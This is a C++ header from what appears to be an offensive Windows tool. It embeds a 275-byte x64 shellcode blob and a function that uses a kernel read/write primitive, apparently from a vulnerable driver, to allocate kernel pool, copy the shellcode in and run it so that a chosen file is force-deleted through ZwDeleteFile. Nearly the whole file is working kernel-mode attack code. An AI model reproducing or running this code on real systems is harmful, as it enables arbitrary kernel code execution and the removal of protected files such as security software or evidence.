fdelete/fdelete/fdelete.hpp

#pragma once
#include "vdm_ctx/vdm_ctx.hpp"

namespace fdelete
{
	typedef struct _import_struct_t
	{
		void* ObReferenceObjectByHandlePtr;
		void* ObfDereferenceObjectPtr;
		void* ZwClosePtr;
		void* IoCreateFileSpecifyDeviceObjectHintPtr;
		void* ZwDeleteFilePtr;
		void* RtlInitUnicodeStringPtr;
	} import_struct_t, *pimport_struct_t;

	using entry_delete_t = NTSTATUS(*)(pimport_struct_t, const wchar_t* image_path);
	using ex_allocate_t = void* (*)(std::uint16_t, std::size_t);
	using ex_free_t = bool(*)(void*);

	// NTSTATUS EntryDelete(PIMPORT_STRUCT Imports, PWCHAR ImagePath)
	inline unsigned char shellcode[275] =
	{
		0x48, 0x89, 0x5C, 0x24, 0x10, 0x55, 0x48, 0x8D, 0x6C, 0x24, 0xA9, 0x48,
		0x81, 0xEC, 0xD0, 0x00, 0x00, 0x00, 0x48, 0x83, 0x65, 0x67, 0x00, 0x48,
		0x8B, 0xD9, 0x48, 0x8D, 0x4D, 0x07, 0xFF, 0x53, 0x28, 0x48, 0x83, 0x64,
		0x24, 0x70, 0x00, 0x48, 0x8D, 0x45, 0x07, 0x48, 0x83, 0x65, 0x2F, 0x00,
		0x4C, 0x8D, 0x4D, 0x17, 0xC7, 0x44, 0x24, 0x68, 0x00, 0x08, 0x00, 0x00,
		0x4C, 0x8D, 0x45, 0x27, 0x48, 0x83, 0x64, 0x24, 0x60, 0x00, 0x48, 0x8D,
		0x4D, 0x77, 0x83, 0x64, 0x24, 0x58, 0x00, 0x0F, 0x57, 0xC0, 0x83, 0x64,
		0x24, 0x50, 0x00, 0xBA, 0x81, 0x01, 0x10, 0x00, 0x48, 0x83, 0x64, 0x24,
		0x48, 0x00, 0xC7, 0x44, 0x24, 0x40, 0x60, 0x00, 0x00, 0x00, 0xC7, 0x44,
		0x24, 0x38, 0x01, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x30, 0x07, 0x00,
		0x00, 0x00, 0x83, 0x64, 0x24, 0x28, 0x00, 0x48, 0x83, 0x64, 0x24, 0x20,
		0x00, 0x48, 0x89, 0x45, 0x37, 0x48, 0x8B, 0x43, 0x18, 0x0F, 0x11, 0x45,
		0x17, 0xC7, 0x45, 0x27, 0x30, 0x00, 0x00, 0x00, 0xC7, 0x45, 0x3F, 0x40,
		0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x45, 0x47, 0xFF, 0xD0, 0x85, 0xC0,
		0x75, 0x58, 0x48, 0x83, 0x64, 0x24, 0x28, 0x00, 0x48, 0x8D, 0x4D, 0x67,
		0x48, 0x8B, 0x03, 0x45, 0x33, 0xC9, 0x48, 0x89, 0x4C, 0x24, 0x20, 0x45,
		0x33, 0xC0, 0x48, 0x8B, 0x4D, 0x77, 0x33, 0xD2, 0xFF, 0xD0, 0x85, 0xC0,
		0x75, 0x34, 0x48, 0x8B, 0x45, 0x67, 0x48, 0x8B, 0x48, 0x28, 0x48, 0x83,
		0x61, 0x10, 0x00, 0x48, 0x8D, 0x4D, 0x27, 0x48, 0x8B, 0x45, 0x67, 0xC6,
		0x40, 0x4C, 0x01, 0x48, 0x8B, 0x43, 0x20, 0xFF, 0xD0, 0x85, 0xC0, 0x75,
		0x11, 0x48, 0x8B, 0x4D, 0x67, 0xFF, 0x53, 0x08, 0x48, 0x8B, 0x43, 0x10,
		0x48, 0x8B, 0x4D, 0x77, 0xFF, 0xD0, 0x48, 0x8B, 0x9C, 0x24, 0xE8, 0x00,
		0x00, 0x00, 0x48, 0x81, 0xC4, 0xD0, 0x00, 0x00, 0x00, 0x5D, 0xC3
	};

	auto remove(vdm::vdm_ctx* vdm, const wchar_t* image_path) -> bool
	{
		static const auto ex_allocate_pool =
			util::get_kmodule_export("ntoskrnl.exe", "ExAllocatePool");

		static const auto ex_free_pool = 
			util::get_kmodule_export("ntoskrnl.exe", "ExFreePool");
		
		static import_struct_t imports;
		static std::once_flag once;
		std::call_once(once, [&]()-> void 
		{
			imports.IoCreateFileSpecifyDeviceObjectHintPtr = 
				util::get_kmodule_export("ntoskrnl.exe", "IoCreateFileSpecifyDeviceObjectHint");

			imports.ObfDereferenceObjectPtr = 
				util::get_kmodule_export("ntoskrnl.exe", "ObfDereferenceObject");

			imports.ObReferenceObjectByHandlePtr = 
				util::get_kmodule_export("ntoskrnl.exe", "ObReferenceObjectByHandle");

			imports.RtlInitUnicodeStringPtr = 
				util::get_kmodule_export("ntoskrnl.exe", "RtlInitUnicodeString");

			imports.ZwClosePtr = 
				util::get_kmodule_export("ntoskrnl.exe", "ZwClose");

			imports.ZwDeleteFilePtr = 
				util::get_kmodule_export("ntoskrnl.exe", "ZwDeleteFile");
		});

		const auto shellcode_base = 
			vdm->syscall<ex_allocate_t>(
				ex_allocate_pool, NULL, sizeof shellcode);

		vdm->wkm(shellcode_base, shellcode, sizeof shellcode);

		const auto result = 
			vdm->syscall<entry_delete_t>(
				shellcode_base, &imports, image_path);

		vdm->syscall<ex_free_t>(ex_free_pool, shellcode_base);
		return result == STATUS_SUCCESS;
	}
}